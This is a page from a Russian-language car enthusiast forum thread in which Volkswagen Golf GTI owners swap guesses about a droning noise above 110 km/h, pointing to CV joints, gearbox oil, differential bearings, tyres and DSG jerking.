+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 30

Тема: "Гул" на скорости выше 110

GTI-Racing Palma is on a distinguished road Аватар для Palma
    Машина
    BMW F10
    Цитата Сообщение от Alexandr 922 Посмотреть сообщение
    я бы внутренние шрусы посмотрел
    А они могут гудеть? сколько помнил трещали при повороте если кирдык им.
    Тогда у мну встречный вопрос Сань. Могут ли при движении на скорости, и торможением передачей они гудеть? или же всё таки это подшипники диффа. коробас ДСГ)))

Цитата Сообщение от Palma Посмотреть сообщение
    А они могут гудеть? сколько помнил трещали при повороте если кирдык им.
    Тогда у мну встречный вопрос Сань. Могут ли при движении на скорости, и торможением передачей они гудеть? или же всё таки это подшипники диффа. коробас ДСГ)))
    ---- может и в коробке дело . Я бы смотрел именно все что касается шрусов и кпп , там где они крепяться .

GTI-Racing popoopop123 is on a distinguished road Аватар для popoopop123
    Машина
    Golf-V GTI
    Гул на что похож? механический?
    Было такое, масло в коробку подлить или в целом заменить.
    Как раз на 100 - 110 он у меня и появлялся. Правда не на гольфе)
    Но если он у тебя реально только в определенный момент всегда появляется, то точно масло в коробке

GTI-Racing Pilot® is on a distinguished road Аватар для Pilot®
    Машина
    GTi V
    А может банальней - покрышки.
    Что за резина, шипованая ? =)
    Бери ношу по себе, чтоб не падать при ходьбе.

GTI-Racing Kurch is on a distinguished road Аватар для Kurch
    Машина
    Golf 5 GTI DSG
    Цитата Сообщение от popoopop123 Посмотреть сообщение
    Гул на что похож? механический?
    Было такое, масло в коробку подлить или в целом заменить.
    Как раз на 100 - 110 он у меня и появлялся. Правда не на гольфе)
    Но если он у тебя реально только в определенный момент всегда появляется, то точно масло в коробке
    На сервисе сказали что масло немного "потеет (из коробки)" не критично, но лучше заменить "сальник"
    Масло заливал прошлый собственник. Ты от него избавился(от гула)?Гул похож на завывание монотонное пропадающее на 130.

Добавлено через 47 минут
    Есть кстати небольшие подергивания автомобиля при ускорении с 70-80 до 100 где-то, а вчера на трассе при обгоне начались дергания сильнее и мигал "чек енжин" через 2 секунды пропал и все ок. Лямда если что выдает ошибку, следовательно надо ее заменить, руки не доходят.в ней может быть дело?(подергивания).Официалы про коробас ни слова(при покупке проводил диагностику них ).Не уж то коробка помирает?(((((
    Последний раз редактировалось Kurch; 30.07.2012 в 20:47. Причина: Добавлено сообщение

GTI-Racing popoopop123 is on a distinguished road Аватар для popoopop123
    Машина
    Golf-V GTI
    у тебя dsg? есди да то я про них ваще ниче не знаю лучше реал не трогай :commandos:

Машина
    Golf 5 GTI DSG
    Если масло менялось, то может замена фильтра+ подлить масла+ заменить сальник вылечит гул и рывки?Никто не сталкивался?

GTI-Racing Palma is on a distinguished road Аватар для Palma
    Машина
    BMW F10
    Вообще как помню было на Г4 на механике, когда начинала выть коробка оказалось что всё масло вытекло, и гудели подшипники первички. разобрав стало понятно что всё сожгли и внутринности ставили новые.

Тут скорее другая ситуация. Spaceman сказал что от ШРУСов и приводов будет только дисбаланс. Конечно в теории это подшипники диффа или самих валов в коробасе. моё ИМХО, но я так уже тыс 50 проехал. сам собираюсь мыслями о том что всё таки предётся её перебирать и соотв. ставить дифф самоблоку. но пока не к месту по финансам(((

Машина
    Golf 5 GTI DSG
    Цитата Сообщение от Palma Посмотреть сообщение
    Вообще как помню было на Г4 на механике, когда начинала выть коробка оказалось что всё масло вытекло, и гудели подшипники первички. разобрав стало понятно что всё сожгли и внутринности ставили новые.

Тут скорее другая ситуация. Spaceman сказал что от ШРУСов и приводов будет только дисбаланс. Конечно в теории это подшипники диффа или самих валов в коробасе. моё ИМХО, но я так уже тыс 50 проехал. сам собираюсь мыслями о том что всё таки предётся её перебирать и соотв. ставить дифф самоблоку. но пока не к месту по финансам(((
    Ну сальник я думаю в любом случае заменить, может масло подлить либо заново залить, х\з.И надо будет послушать,заодно тогда балансировку сделаю может исправит ситуацию.Вчера проверил при легком разгоне с 70 до 80 дергает чутка, в мануале ничего нету и в S тоже самое ни дергания ничего, разгон ровный.будем смотреть.

Мимо проходил Руслан5 is on a distinguished road Аватар для Руслан5
    Машина
    Джедай 5
    Цитата Сообщение от Kurch Посмотреть сообщение
    Такая проблема, на скорости от 110 (на 120 особенно слышно) появляется гул снизу в районе колес.Советовали перекинуть резину и отбалансировать , кто то говорил что опора двигателя , мб подшипник.Диагностика у официалов делалась (при покупке) ни про подшипник ни про опору , слова не было.Никто не сталкивался?
    проблема решилась??у меня те же самые симптомы, начинается на 100 и при 130-140 уже заглушается шумом от колес. склоняюсь к шрусам, т.к. официалы сказали что один из шрусов (не помню какой, они попутно заметили когда стойки меняли) из под пыльника слегка масло давит...мысли и на дсг есть, он дергает при трогании, переключает ровно, при торможении подклевывает. предыдущий владелец промывал дсг перед продажей.

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя